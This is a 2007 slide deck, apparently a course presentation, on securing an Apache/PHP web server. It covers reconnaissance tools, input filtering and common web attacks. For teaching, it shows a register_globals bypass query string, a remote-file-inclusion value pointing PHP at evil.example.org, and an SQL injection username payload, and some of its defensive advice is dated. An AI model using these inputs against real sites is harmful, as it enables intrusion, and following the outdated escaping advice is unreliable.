Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache

1. Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache Created By: John Gibbons November 27th, 2007

2. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

3. Overview • PHP • Terminology • Vulnerabilities • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

4. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

5. Overview • Installing a Personal Web Server • XAMPP • Installation • Hardening Security • Updates

6. Overview • Review • Conclusion • Sources • Questions

7. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

8. Background • Apache and PHP are free, open source web development tools. • Apache • In development since 1995 • Software that allows a computer to act as a web server • PHP • Server side HTML embedded scripting language • Allows for the creation of dynamic web pages

9. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

10. NMAP • Open source tool common used by hackers • Host Discovery • Identifying computers on a network • Port Scanning • Enumerating the open ports on one or more target computers

11. NMAP • Version Detection • Interrogating listening network services listening on remote computers to determine the application name and version number. • Detection • Remotely determining the operating system and some hardware characteristics of network devices

12. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

13. Intellitamper • Upon discovering desired (vulnerable) ports/services, directories can be mapped • Attackers can view directories they were not meant to see

14. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

15. Whois

16. Whois

17. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

18. PHP Terminology • Public Scripts: Scripts available via a URL • White list: Assuming input to be invalid until proven valid • Data Filtering: Examining data from an external source to ensure it meets the criteria to be considered valid

19. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

20. PHP Security • Data Filtering • Initialize all variables • Filter all data that comes from an external source • Develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development • Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice • Consider all data invalid until it is proven valid

21. PHP Security • Data Filtering Guidelines • Ensure that data filtering cannot bypassed • Ensure that invalid data cannot be mistaken for valid data • Identify the origin of the data

22. PHP Security • Register Globals • Disabled by default (version 4.2.0 and greater) • Prevents regular globals from affecting data submitted by the client

23. PHP Security • Register Globals Example if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } • This page can be requested with ?authorized=1 in the query string to bypass the intended access control

24. PHP Security • Register Globals Example: include "$path/script.php"; • This page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F • In the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php'; • If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file

25. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

26. PHP Data Filtering • The following validates an email address: <?php $clean = array(); $email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i'; if (preg_match($email_pattern, $_POST['email'])) { $clean['email'] = $_POST['email']; } ?>

27. PHP Data Filtering • The following example ensures that $_POST['num'] is an integer: <?php $clean = array(); if ($_POST['num'] == strval(intval($_POST['num']))) { $clean['num'] = $_POST['num']; } ?>

28. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

29. PHP Naming Conventions • Take a white list approach • Use variable names that are easy to identify as valid • $clean from previous example • Never leave variables in the $_GET and $_POST arrays because they are not easily identifiable as valid

30. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

31. PHP Timing • Once a PHP script begins to run, the HTTP request has been received • The user no longer has the opportunity to send data • This makes data initialization a very good practice

32. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

33. PHP Error Reporting • error_reporting • Sets level of error reporting • Set to E_ALL for both development and production • error_reporting (E_ALL); • display_errors • Displays errors on screen • Use during development • Disable during production • Could be useful for potential attackers

34. PHP Error Reporting • log_errors • Should be turned on during production • Will only induce a performance hit if there is a serious number of errors • error_log • Dictates the location for the error log • The web server should have write privileges for this file

35. PHP Error Reporting • NEW • As of PHP 5.0, there is E_STRICT • not included within E_ALL • useful during development • warns about using depreciated functions

36. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

37. SQL: Exposed Access Credentials • Many PHP applications interact with a database • Credentials, used for authentication, are sometimes stored in a plain text file: <?php $host = 'example.org'; $username = 'myuser'; $password = 'mypass'; $db = mysql_connect($host, $username, $password); ?>

38. SQL: Exposed Access Credentials • The previous example would be stored in a file called “db.inc” . • This file in included whenever database access is needed. • This approach offers convinience by storing all credentials in a single file.

39. SQL: Exposed Access Credentials • Potential problems arise when a document containing credentials is stored somewhere within the document root. • Every document within the document root as a URL associated with it. • Despite not publicly linking to the document, if it is stored in the inappropriate place, it will still be accessible to an attacker.

40. SQL: Exposed Access Credentials • A simple solution is to place this files, and all modules, outside of the document root. • Both include and require can accept file system paths

41. SQL: Exposed Access Credentials • Another solution is to place the following in the “httpd.conf” file (this file is only used with apache) <Files ~ "\.inc$"> Order allow,deny Deny from all </Files>

42. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

43. SQL Injection • Result of data not being filtered. • Example: <?php $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', '$reg_password', '{$_POST['reg_email']}')"; ?>

44. SQL Injection • This simple example allows the user to input a user name, password, and email address in order to create an account. • However, without data filtering, an attacker could enter the following into the user name field: bad_guy', 'mypass', ''), ('good_guy

45. SQL Injection • Assume the attacker gives a valid email address and the application generates the password “1234” • The SQL statement becomes: $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('bad_guy', 'mypass', ''), ('good_guy', '1234', 'shiflett@php.net')";

46. SQL Injection • The attacker has successfully created two accounts, and was able to supply all the information for the “bad guy” account. • The automatically generated password was bypassed

47. SQL Injection: Protection • Filter your data • Escape your data • Valid input may interfere with SQL formatting. • Use functions native to your database to handle escaping any characters that may interfere. • i.e. mysql_escape_string()

48. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

49. Cross Site Scripting (XSS) • Exploit the trust a user has for a particular site. • Users don't necessarily have a high level of trust for any web site, but the browser does. For example, when the browser sends cookies in a request, it is trusting the web site. Users may also have different browsing habits or even different levels of security defined in their browser depending on which site they are visiting.

50. Cross Site Scripting (XSS) • Generally involve web sites that display external data. • Applications at a heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).